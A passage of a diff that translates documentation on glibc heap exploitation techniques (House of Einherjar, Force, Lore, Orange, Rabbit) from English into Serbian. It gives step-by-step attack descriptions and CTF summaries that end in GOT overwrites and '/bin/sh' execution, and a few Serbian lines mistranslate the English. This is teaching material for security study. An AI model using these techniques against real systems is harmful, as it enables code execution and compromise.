-- One-byte overflow with a null byte from one chunk to the next one to modify the `PREV_INUSE` flag.
-- Indicate in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk
-  - The fake chunk size must also have been set the same size to bypass sanity checks
-- For constructing these chunks, you will need a heap leak.
+- Kreirati lažni chunk kada želimo da alociramo chunk:
+- Postaviti pokazivače da upućuju na sebe kako bi se zaobišle provere
+- Overflow od jednog bajta sa null bajtom iz jednog chunca u sledeći kako bi se modifikovao `PREV_INUSE` flag.
+- Naznačiti u `prev_size` lažnog chunca razliku između njega i lažnog chunca
+- Veličina lažnog chunca takođe mora biti postavljena na istu veličinu kako bi se zaobišle provere
+- Za konstrukciju ovih chunkova, biće vam potreban heap leak.
 
-### Attack
+### Napad
 
-- `A` fake chunk is created inside a chunk controlled by the attacker pointing with `fd` and `bk` to the original chunk to bypass protections
-- 2 other chunks (`B` and `C`) are allocated
-- Abusing the off by one in the `B` one the `prev in use` bit is cleaned and the `prev_size` data is overwritten with the difference between the place where the `C` chunk is allocated, to the fake `A` chunk generated before
-  - This `prev_size` and the size in the fake chunk `A` must be the same to bypass checks.
-- Then, the tcache is filled
-- Then, `C` is freed so it consolidates with the fake chunk `A`
-- Then, a new chunk `D` is created which will be starting in the fake `A` chunk and covering `B` chunk
-  - The house of Einherjar finishes here
-- This can be continued with a fast bin attack or Tcache poisoning:
-  - Free `B` to add it to the fast bin / Tcache
-  - `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside) 
-  - Then, 2 mallocs are done and the second one is going to be **allocating the target address**
+- `A` lažni chunk se kreira unutar chunca koji kontroliše napadač, upućujući sa `fd` i `bk` na originalni chunk kako bi se zaštili
+- Alociraju se 2 druga chunca (`B` i `C`)
+- Zloupotrebljavajući off by one u `B`, `prev in use` bit se čisti i `prev_size` podaci se prepisuju sa razlikom između mesta gde je alociran `C` chunk, do lažnog `A` chunca generisanog pre
+- Ovaj `prev_size` i veličina u lažnom chunku `A` moraju biti iste kako bi se zaobišle provere.
+- Zatim, tcache se popunjava
+- Zatim, `C` se oslobađa kako bi se konsolidovao sa lažnim chunkom `A`
+- Zatim, kreira se novi chunk `D` koji će početi u lažnom `A` chunku i pokriti `B` chunk
+- Kuća Einherjar se ovde završava
+- Ovo se može nastaviti brzim bin napadom ili Tcache trovanjem:
+- Oslobodite `B` da ga dodate u brzi bin / Tcache
+- `B`'s `fd` se prepisuje tako da pokazuje na ciljnu adresu zloupotrebljavajući `D` chunk (jer sadrži `B` unutar) 
+- Zatim, vrše se 2 malloc-a i drugi će biti **alociranje ciljne adrese**
 
-## References and other examples
+## Reference i drugi primeri
 
 - [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c)
 - **CTF** [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_einherjar/#2016-seccon-tinypad**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_einherjar/#2016-seccon-tinypad)
-  - After freeing pointers their aren't nullified, so it's still possible to access their data. Therefore a chunk is placed in the unsorted bin and leaked the pointers it contains (libc leak) and then a new heap is places on the unsorted bin and leaked a heap address from the pointer it gets.
+- Nakon oslobađanja pokazivača, oni nisu nullifikovani, tako da je još uvek moguće pristupiti njihovim podacima. Stoga se chunk postavlja u nesortirani bin i curi pokazivače koje sadrži (libc leak) i zatim se novi heap postavlja na nesortirani bin i curi adresu heap-a iz pokazivača koji dobija.
 - [**baby-talk. DiceCTF 2024**](https://7rocky.github.io/en/ctf/other/dicectf/baby-talk/)
-  - Null-byte overflow bug in `strtok`.
-  - Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive.
+- Null-byte overflow greška u `strtok`.
+- Koristite House of Einherjar da dobijete situaciju preklapanja chunkova i završite sa Tcache trovanjem kako biste dobili proizvoljnu write primitivu.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/house-of-force.md b/src/binary-exploitation/libc-heap/house-of-force.md
index 7d4fb9247..ded048b17 100644
--- a/src/binary-exploitation/libc-heap/house-of-force.md
+++ b/src/binary-exploitation/libc-heap/house-of-force.md
@@ -2,43 +2,41 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-### Code
+### Kod
 
-- This technique was patched ([**here**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) and produces this error: `malloc(): corrupted top size`
-  - You can try the [**code from here**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) to test it if you want.
+- Ova tehnika je zakrpljena ([**ovde**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) i proizvodi ovu grešku: `malloc(): corrupted top size`
+- Možete probati [**kod odavde**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) da ga testirate ako želite.
 
-### Goal
+### Cilj
 
-- The goal of this attack is to be able to allocate a chunk in a specific address.
+- Cilj ovog napada je da se omogući alokacija dela u specifičnoj adresi.
 
-### Requirements
+### Zahtevi
 
-- An overflow that allows to overwrite the size of the top chunk header (e.g. -1).
-- Be able to control the size of the heap allocation
+- Overflow koji omogućava prepisivanje veličine zaglavlja gornjeg dela (npr. -1).
+- Mogućnost kontrole veličine alokacije na heap-u.
 
-### Attack
+### Napad
 
-If an attacker wants to allocate a chunk in the address P to overwrite a value here. He starts by overwriting the top chunk size with `-1` (maybe with an overflow). This ensures that malloc won't be using mmap for any allocation as the Top chunk will always have enough space.
-
-Then, calculate the distance between the address of the top chunk and the target space to allocate. This is because a malloc with that size will be performed in order to move the top chunk to that position. This is how the difference/size can be easily calculated:
+Ako napadač želi da alocira deo na adresi P da bi prepisao vrednost ovde. Počinje prepisivanjem veličine gornjeg dela sa `-1` (možda uz pomoć overflow-a). Ovo osigurava da malloc neće koristiti mmap za bilo koju alokaciju jer će gornji deo uvek imati dovoljno prostora.
 
+Zatim, izračunajte razdaljinu između adrese gornjeg dela i ciljnog prostora za alokaciju. To je zato što će se malloc sa tom veličinom izvršiti kako bi se gornji deo pomerio na tu poziciju. Ovako se razlika/veličina može lako izračunati:
 ```c
 // From https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c#L59C2-L67C5
 /*
- * The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
- * new_top = old_top + nb
- * nb = new_top - old_top
- * req + 2sizeof(long) = new_top - old_top
- * req = new_top - old_top - 2sizeof(long)
- * req = target - 2sizeof(long) - old_top - 2sizeof(long)
- * req = target - old_top - 4*sizeof(long)
- */
+* The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
+* new_top = old_top + nb
+* nb = new_top - old_top
+* req + 2sizeof(long) = new_top - old_top
+* req = new_top - old_top - 2sizeof(long)
+* req = target - 2sizeof(long) - old_top - 2sizeof(long)
+* req = target - old_top - 4*sizeof(long)
+*/
 ```
-
-Therefore, allocating a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when allocated) will move the top chunk to the address we want to overwrite.\
-Then, do another malloc to get a chunk at the target address.
+Zato, alociranje veličine `target - old_top - 4*sizeof(long)` (4 long-a su zbog metapodataka gornjeg dela i novog dela kada se alocira) će pomeriti gornji deo na adresu koju želimo da prepišemo.\
+Zatim, uradite još jedan malloc da dobijete deo na ciljnoj adresi.
 
 ### References & Other Examples
 
@@ -48,17 +46,17 @@ Then, do another malloc to get a chunk at the target address.
 - [https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c)
 - [https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html)
 - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#hitcon-training-lab-11](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#hitcon-training-lab-11)
-  - The goal of this scenario is a ret2win where we need to modify the address of a function that is going to be called by the address of the ret2win function
-  - The binary has an overflow that can be abused to modify the top chunk size, which is modified to -1 or p64(0xffffffffffffffff)
-  - Then, it's calculated the address to the place where the pointer to overwrite exists, and the difference from the current position of the top chunk to there is alloced with `malloc`
-  - Finally a new chunk is alloced which will contain this desired target inside which is overwritten by the ret2win function
+- Cilj ovog scenarija je ret2win gde treba da modifikujemo adresu funkcije koja će biti pozvana adresom ret2win funkcije
+- Binarni fajl ima overflow koji se može iskoristiti za modifikaciju veličine gornjeg dela, koja se menja na -1 ili p64(0xffffffffffffffff)
+- Zatim se izračunava adresa mesta gde se nalazi pokazivač koji treba prepisati, a razlika od trenutne pozicije gornjeg dela do tamo se alocira sa `malloc`
+- Na kraju se alocira novi deo koji će sadržati ovu željenu metu unutar koje se prepisuje funkcija ret2win
 - [https://shift--crops-hatenablog-com.translate.goog/entry/2016/03/21/171249?\_x_tr_sl=es&\_x_tr_tl=en&\_x_tr_hl=en&\_x_tr_pto=wapp](https://shift--crops-hatenablog-com.translate.goog/entry/2016/03/21/171249?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
-  - In the `Input your name:` there is an initial vulnerability that allows to leak an address from the heap
-  - Then in the `Org:` and `Host:` functionality its possible to fill the 64B of the `s` pointer when asked for the **org name**, which in the stack is followed by the address of v2, which is then followed by the indicated **host name**. As then, strcpy is going to be copying the contents of s to a chunk of size 64B, it's possible to **overwrite the size of the top chunk** with the data put inside the **host name**.
-  - Now that arbitrary write it possible, the `atoi`'s GOT was overwritten to the address of printf. the it as possible to leak the address of `IO_2_1_stderr` _with_ `%24$p`. And with this libc leak it was possible to overwrite `atoi`'s GOT again with the address to `system` and call it passing as param `/bin/sh`
-    - An alternative method [proposed in this other writeup](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#2016-bctf-bcloud), is to overwrite `free` with `puts`, and then add the address of `atoi@got`, in the pointer that will be later freed so it's leaked and with this leak overwrite again `atoi@got` with `system` and call it with `/bin/sh`.
+- U `Input your name:` postoji inicijalna ranjivost koja omogućava curenje adrese iz heap-a
+- Zatim u `Org:` i `Host:` funkcionalnosti moguće je popuniti 64B `s` pokazivača kada se traži **org name**, koji u steku sledi adresu v2, koja zatim sledi označenoj **host name**. Kako će strcpy kopirati sadržaj s u deo veličine 64B, moguće je **prepisati veličinu gornjeg dela** sa podacima stavljenim unutar **host name**.
+- Sada kada je proizvoljno pisanje moguće, `atoi`-ov GOT je prepisan na adresu printf. tako je bilo moguće curiti adresu `IO_2_1_stderr` _sa_ `%24$p`. I sa ovim libc curenjem bilo je moguće ponovo prepisati `atoi`-ov GOT sa adresom `system` i pozvati ga prosledivši kao parametar `/bin/sh`
+- Alternativna metoda [predložena u ovom drugom izveštaju](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#2016-bctf-bcloud) je da se prepisuje `free` sa `puts`, a zatim dodaje adresa `atoi@got`, u pokazivač koji će kasnije biti oslobođen tako da se curi i sa ovim curenjem ponovo prepisuje `atoi@got` sa `system` i poziva ga sa `/bin/sh`.
 - [https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html)
-  - There is a UAF allowing to reuse a chunk that was freed without clearing the pointer. Because there are some read methods, it's possible to leak a libc address writing a pointer to the free function in the GOT here and then calling the read function.
-  - Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content.
+- Postoji UAF koji omogućava ponovnu upotrebu dela koji je oslobođen bez brisanja pokazivača. Zbog nekih metoda čitanja, moguće je curiti libc adresu pisanjem pokazivača na funkciju free u GOT ovde i zatim pozivajući funkciju za čitanje.
+- Zatim, House of force je korišćen (zloupotrebljavajući UAF) da prepiše veličinu preostalog prostora sa -1, alocira deo dovoljno veliki da dođe do free hook-a, a zatim alocira još jedan deo koji će sadržati free hook. Zatim, upisuje u hook adresu `system`, upisuje u deo `"/bin/sh"` i konačno oslobađa deo sa tim sadržajem.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/house-of-lore.md b/src/binary-exploitation/libc-heap/house-of-lore.md
index 862ba7323..263821040 100644
--- a/src/binary-exploitation/libc-heap/house-of-lore.md
+++ b/src/binary-exploitation/libc-heap/house-of-lore.md
@@ -2,43 +2,43 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-### Code
+### Kod
 
-- Check the one from [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/)
-  - This isn't working
-- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)
-  - This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`
-- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) 
+- Proverite onaj sa [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/)
+- Ovo ne radi
+- Ili: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)
+- Ovo ne radi čak i ako pokušava da zaobiđe neke provere dobijajući grešku: `malloc(): unaligned tcache chunk detected`
+- Ovaj primer još uvek radi: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) 
 
-### Goal
+### Cilj
 
-- Insert a **fake small chunk in the small bin so then it's possible to allocate it**.\
-  Note that the small chunk added is the fake one the attacker creates and not a fake one in an arbitrary position.
+- Umetnite **lažni mali deo u mali kontejner kako bi ga bilo moguće alocirati**.\
+Napomena: mali deo koji se dodaje je lažni koji napadač kreira, a ne lažni deo na proizvoljnom mestu.
 
-### Requirements
+### Zahtevi
 
-- Create 2 fake chunks and link them together and with the legit chunk in the small bin:
-  - `fake0.bk` -> `fake1`
-  - `fake1.fd` -> `fake0`
-  - `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
-  - `legit.bk` -> `fake0`
+- Kreirajte 2 lažna dela i povežite ih zajedno i sa legitimnim delom u malom kontejneru:
+- `fake0.bk` -> `fake1`
+- `fake1.fd` -> `fake0`
+- `fake0.fd` -> `legit` (morate modifikovati pokazivač u oslobođenom malom delu putem neke druge ranjivosti)
+- `legit.bk` -> `fake0`
 
-Then you will be able to allocate `fake0`.
+Tada ćete moći da alocirate `fake0`.
 
-### Attack
+### Napad
 
-- A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with top chunk. Then, `legit` is freed (moving it to the unsorted bin list) and the a larger chunk is allocated, **moving `legit` it to the small bin.**
-- An attacker generates a couple of fake small chunks, and makes the needed linking to bypass sanity checks:
-  - `fake0.bk` -> `fake1`
-  - `fake1.fd` -> `fake0`
-  - `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
-  - `legit.bk` -> `fake0`
-- A small chunk is allocated to get legit, making **`fake0`** into the top list of small bins
-- Another small chunk is allocated, getting `fake0` as a chunk, allowing potentially to read/write pointers inside of it.
+- Mali deo (`legit`) se alocira, zatim se alocira još jedan kako bi se sprečilo konsolidovanje sa vrhunskim delom. Zatim, `legit` se oslobađa (premestajući ga u listu nesortiranih delova) i alocira se veći deo, **premestajući `legit` u mali kontejner.**
+- Napadač generiše nekoliko lažnih malih delova i pravi potrebna povezivanja da bi zaobišao provere:
+- `fake0.bk` -> `fake1`
+- `fake1.fd` -> `fake0`
+- `fake0.fd` -> `legit` (morate modifikovati pokazivač u oslobođenom malom delu putem neke druge ranjivosti)
+- `legit.bk` -> `fake0`
+- Mali deo se alocira da bi se dobio legitiman, čineći **`fake0`** vrhunskim delom malih kontejnera
+- Alocira se još jedan mali deo, dobijajući `fake0` kao deo, što potencijalno omogućava čitanje/pisanje pokazivača unutar njega.
 
-## References
+## Reference
 
 - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/)
 - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_lore](https://heap-exploitation.dhavalkapil.com/attacks/house_of_lore)
diff --git a/src/binary-exploitation/libc-heap/house-of-orange.md b/src/binary-exploitation/libc-heap/house-of-orange.md
index e57f477c6..f3391d3e1 100644
--- a/src/binary-exploitation/libc-heap/house-of-orange.md
+++ b/src/binary-exploitation/libc-heap/house-of-orange.md
@@ -2,72 +2,72 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-### Code
+### Kod
 
-- Find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c)
-  - The exploitation technique was fixed in this [patch](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb=91e7cf982d0104f0e71770f5ae8e3faf352dea9f;hpb=0c25125780083cbba22ed627756548efe282d1a0) so this is no longer working (working in earlier than 2.26)
-- Same example **with more comments** in [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)
+- Pronađite primer na [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c)
+- Tehnika eksploatacije je ispravljena u ovom [patchu](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb=91e7cf982d0104f0e71770f5ae8e3faf352dea9f;hpb=0c25125780083cbba22ed627756548efe282d1a0) tako da ovo više ne funkcioniše (radi u verzijama pre 2.26)
+- Isti primer **sa više komentara** na [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)
 
-### Goal
+### Cilj
 
-- Abuse `malloc_printerr` function
+- Zloupotreba `malloc_printerr` funkcije
 
-### Requirements
+### Zahtevi
 
-- Overwrite the top chunk size
-- Libc and heap leaks
+- Prepisivanje veličine gornjeg dela
+- Libc i heap leakovi
 
-### Background
+### Pozadina
 
-Some needed background from the comments from [**this example**](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)**:**
+Neka potrebna pozadina iz komentara iz [**ovog primera**](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)**:**
 
-Thing is, in older versions of libc, when the `malloc_printerr` function was called it would **iterate through a list of `_IO_FILE` structs stored in `_IO_list_all`**, and actually **execute** an instruction pointer in that struct.\
-This attack will forge a **fake `_IO_FILE` struct** that we will write to **`_IO_list_all`**, and cause `malloc_printerr` to run.\
-Then it will **execute whatever address** we have stored in the **`_IO_FILE`** structs jump table, and we will get code execution
+Stvar je u tome da, u starijim verzijama libc, kada je pozvana `malloc_printerr` funkcija, ona bi **iterirala kroz listu `_IO_FILE` struktura smeštenih u `_IO_list_all`**, i zapravo **izvršila** pokazivač instrukcija u toj strukturi.\
+Ovaj napad će falsifikovati **lažnu `_IO_FILE` strukturu** koju ćemo napisati u **`_IO_list_all`**, i izazvati `malloc_printerr` da se pokrene.\
+Zatim će **izvršiti bilo koju adresu** koju imamo smeštenu u **`_IO_FILE`** tabeli skakanja, i dobićemo izvršenje koda.
 
-### Attack
+### Napad
 
-The attack starts by managing to get the **top chunk** inside the **unsorted bin**. This is achieved by calling `malloc` with a size greater than the current top chunk size but smaller than **`mmp_.mmap_threshold`** (default is 128K), which would otherwise trigger `mmap` allocation. Whenever the top chunk size is modified, it's important to ensure that the **top chunk + its size** is page-aligned and that the **prev_inuse** bit of the top chunk is always set.
+Napad počinje tako što se uspeva dobiti **gornji deo** unutar **nesortiranog bin-a**. To se postiže pozivanjem `malloc` sa veličinom većom od trenutne veličine gornjeg dela, ali manjom od **`mmp_.mmap_threshold`** (podrazumevano je 128K), što bi inače pokrenulo `mmap` alokaciju. Kada god se veličina gornjeg dela izmeni, važno je osigurati da je **gornji deo + njegova veličina** usklađena sa stranicom i da je **prev_inuse** bit gornjeg dela uvek postavljen.
 
-To get the top chunk inside the unsorted bin, allocate a chunk to create the top chunk, change the top chunk size (with an overflow in the allocated chunk) so that **top chunk + size** is page-aligned with the **prev_inuse** bit set. Then allocate a chunk larger than the new top chunk size. Note that `free` is never called to get the top chunk into the unsorted bin.
+Da biste dobili gornji deo unutar nesortiranog bin-a, alocirajte deo da biste stvorili gornji deo, promenite veličinu gornjeg dela (sa prelivanjem u alociranom delu) tako da **gornji deo + veličina** bude usklađen sa stranicom sa postavljenim **prev_inuse** bitom. Zatim alocirajte deo veći od nove veličine gornjeg dela. Imajte na umu da `free` nikada nije pozvan da bi se gornji deo stavio u nesortirani bin.
 
-The old top chunk is now in the unsorted bin. Assuming we can read data inside it (possibly due to a vulnerability that also caused the overflow), it’s possible to leak libc addresses from it and get the address of **\_IO_list_all**.
+Stari gornji deo je sada u nesortiranom bin-u. Pretpostavljajući da možemo čitati podatke unutar njega (moguće zbog ranjivosti koja je takođe izazvala prelivanje), moguće je iscuriti libc adrese iz njega i dobiti adresu **\_IO_list_all**.
 
-An unsorted bin attack is performed by abusing the overflow to write `topChunk->bk->fwd = _IO_list_all - 0x10`. When a new chunk is allocated, the old top chunk will be split, and a pointer to the unsorted bin will be written into **`_IO_list_all`**.
+Napad nesortiranog bin-a se vrši zloupotrebom prelivanja da bi se napisalo `topChunk->bk->fwd = _IO_list_all - 0x10`. Kada se alocira novi deo, stari gornji deo će biti podeljen, a pokazivač na nesortirani bin će biti napisan u **`_IO_list_all`**.
 
-The next step involves shrinking the size of the old top chunk to fit into a small bin, specifically setting its size to **0x61**. This serves two purposes:
+Sledeći korak uključuje smanjenje veličine starog gornjeg dela da bi stao u mali bin, posebno postavljajući njegovu veličinu na **0x61**. Ovo ima dva cilja:
 
-1. **Insertion into Small Bin 4**: When `malloc` scans through the unsorted bin and sees this chunk, it will try to insert it into small bin 4 due to its small size. This makes the chunk end up at the head of the small bin 4 list which is the location of the FD pointer of the chunk of **`_IO_list_all`** as we wrote a close address in **`_IO_list_all`** via the unsorted bin attack.
-2. **Triggering a Malloc Check**: This chunk size manipulation will cause `malloc` to perform internal checks. When it checks the size of the false forward chunk, which will be zero, it triggers an error and calls `malloc_printerr`.
+1. **Umetanje u Mali Bin 4**: Kada `malloc` skenira nesortirani bin i vidi ovaj deo, pokušaće da ga umetne u mali bin 4 zbog njegove male veličine. Ovo čini da deo završi na vrhu liste malog bin-a 4, što je lokacija FD pokazivača dela **`_IO_list_all`** jer smo napisali blisku adresu u **`_IO_list_all`** putem napada nesortiranog bin-a.
+2. **Pokretanje Malloc Provere**: Ova manipulacija veličinom dela će izazvati `malloc` da izvrši interne provere. Kada proverava veličinu lažnog naprednog dela, koja će biti nula, izaziva grešku i poziva `malloc_printerr`.
 
-The manipulation of the small bin will allow you to control the forward pointer of the chunk. The overlap with **\_IO_list_all** is used to forge a fake **\_IO_FILE** structure. The structure is carefully crafted to include key fields like `_IO_write_base` and `_IO_write_ptr` set to values that pass internal checks in libc. Additionally, a jump table is created within the fake structure, where an instruction pointer is set to the address where arbitrary code (e.g., the `system` function) can be executed.
+Manipulacija malim bin-om će vam omogućiti da kontrolišete napredni pokazivač dela. Preklapanje sa **\_IO_list_all** se koristi za falsifikovanje lažne **\_IO_FILE** strukture. Struktura je pažljivo oblikovana da uključuje ključna polja kao što su `_IO_write_base` i `_IO_write_ptr` postavljena na vrednosti koje prolaze interne provere u libc. Pored toga, tabela skakanja se kreira unutar lažne strukture, gde je pokazivač instrukcija postavljen na adresu gde se može izvršiti proizvoljan kod (npr. funkcija `system`).
 
-To summarize the remaining part of the technique:
+Da rezimiramo preostali deo tehnike:
 
-- **Shrink the Old Top Chunk**: Adjust the size of the old top chunk to **0x61** to fit it into a small bin.
-- **Set Up the Fake `_IO_FILE` Structure**: Overlap the old top chunk with the fake **\_IO_FILE** structure and set fields appropriately to hijack execution flow.
+- **Smanjite Stari Gornji Deo**: Prilagodite veličinu starog gornjeg dela na **0x61** da bi stao u mali bin.
+- **Postavite Lažnu `_IO_FILE` Strukturu**: Preklopite stari gornji deo sa lažnom **\_IO_FILE** strukturom i postavite polja odgovarajuće da preuzmete tok izvršenja.
 
-The next step involves forging a fake **\_IO_FILE** structure that overlaps with the old top chunk currently in the unsorted bin. The first bytes of this structure are crafted carefully to include a pointer to a command (e.g., "/bin/sh") that will be executed.
+Sledeći korak uključuje falsifikovanje lažne **\_IO_FILE** strukture koja se preklapa sa starim gornjim delom trenutno u nesortiranom bin-u. Prvi bajtovi ove strukture su pažljivo oblikovani da uključuju pokazivač na komandu (npr. "/bin/sh") koja će biti izvršena.
 
-Key fields in the fake **\_IO_FILE** structure, such as `_IO_write_base` and `_IO_write_ptr`, are set to values that pass internal checks in libc. Additionally, a jump table is created within the fake structure, where an instruction pointer is set to the address where arbitrary code can be executed. Typically, this would be the address of the `system` function or another function that can execute shell commands.
+Ključna polja u lažnoj **\_IO_FILE** strukturi, kao što su `_IO_write_base` i `_IO_write_ptr`, postavljena su na vrednosti koje prolaze interne provere u libc. Pored toga, tabela skakanja se kreira unutar lažne strukture, gde je pokazivač instrukcija postavljen na adresu gde se može izvršiti proizvoljan kod. Obično bi to bila adresa funkcije `system` ili druge funkcije koja može izvršiti shell komande.
 
-The attack culminates when a call to `malloc` triggers the execution of the code through the manipulated **\_IO_FILE** structure. This effectively allows arbitrary code execution, typically resulting in a shell being spawned or another malicious payload being executed.
+Napad kulminira kada poziv na `malloc` pokrene izvršenje koda kroz manipuliranu **\_IO_FILE** strukturu. Ovo efikasno omogućava izvršenje proizvoljnog koda, obično rezultirajući pokretanjem shel-a ili izvršavanjem drugog zlonamernog tereta.
 
-**Summary of the Attack:**
+**Rezime Napada:**
 
-1. **Set up the top chunk**: Allocate a chunk and modify the top chunk size.
-2. **Force the top chunk into the unsorted bin**: Allocate a larger chunk.
-3. **Leak libc addresses**: Use the vulnerability to read from the unsorted bin.
-4. **Perform the unsorted bin attack**: Write to **\_IO_list_all** using an overflow.
-5. **Shrink the old top chunk**: Adjust its size to fit into a small bin.
-6. **Set up a fake \_IO_FILE structure**: Forge a fake file structure to hijack control flow.
-7. **Trigger code execution**: Allocate a chunk to execute the attack and run arbitrary code.
+1. **Postavite gornji deo**: Alocirajte deo i izmenite veličinu gornjeg dela.
+2. **Primorajte gornji deo u nesortirani bin**: Alocirajte veći deo.
+3. **Iscurite libc adrese**: Iskoristite ranjivost da čitate iz nesortiranog bin-a.
+4. **Izvršite napad nesortiranog bin-a**: Napišite u **\_IO_list_all** koristeći prelivanje.
+5. **Smanjite stari gornji deo**: Prilagodite njegovu veličinu da stane u mali bin.
+6. **Postavite lažnu \_IO_FILE strukturu**: Falsifikujte lažnu strukturu datoteke da preuzmete tok izvršenja.
+7. **Pokrenite izvršenje koda**: Alocirajte deo da izvršite napad i pokrenete proizvoljan kod.
 
-This approach exploits heap management mechanisms, libc information leaks, and heap overflows to achieve code execution without directly calling `free`. By carefully crafting the fake **\_IO_FILE** structure and placing it in the right location, the attack can hijack the control flow during standard memory allocation operations. This enables the execution of arbitrary code, potentially resulting in a shell or other malicious activities.
+Ovaj pristup koristi mehanizme upravljanja heap-om, iscurivanje informacija iz libc i prelivanja heap-a da bi se postiglo izvršenje koda bez direktnog pozivanja `free`. Pažljivim oblikovanjem lažne **\_IO_FILE** strukture i njenim postavljanjem na pravo mesto, napad može preuzeti tok izvršenja tokom standardnih operacija alokacije memorije. Ovo omogućava izvršenje proizvoljnog koda, potencijalno rezultirajući shell-om ili drugim zlonamernim aktivnostima.
 
-## References
+## Reference
 
 - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_orange/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_orange/)
 - [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)
diff --git a/src/binary-exploitation/libc-heap/house-of-rabbit.md b/src/binary-exploitation/libc-heap/house-of-rabbit.md
index 230b7c63e..461b8c441 100644
--- a/src/binary-exploitation/libc-heap/house-of-rabbit.md
+++ b/src/binary-exploitation/libc-heap/house-of-rabbit.md
@@ -2,110 +2,92 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Requirements
+### Zahtevi
 
-1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
-2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
+1. **Sposobnost modifikacije fast bin fd pokazivača ili veličine**: To znači da možete promeniti unapred pokazivač chunk-a u fastbin-u ili njegovu veličinu.
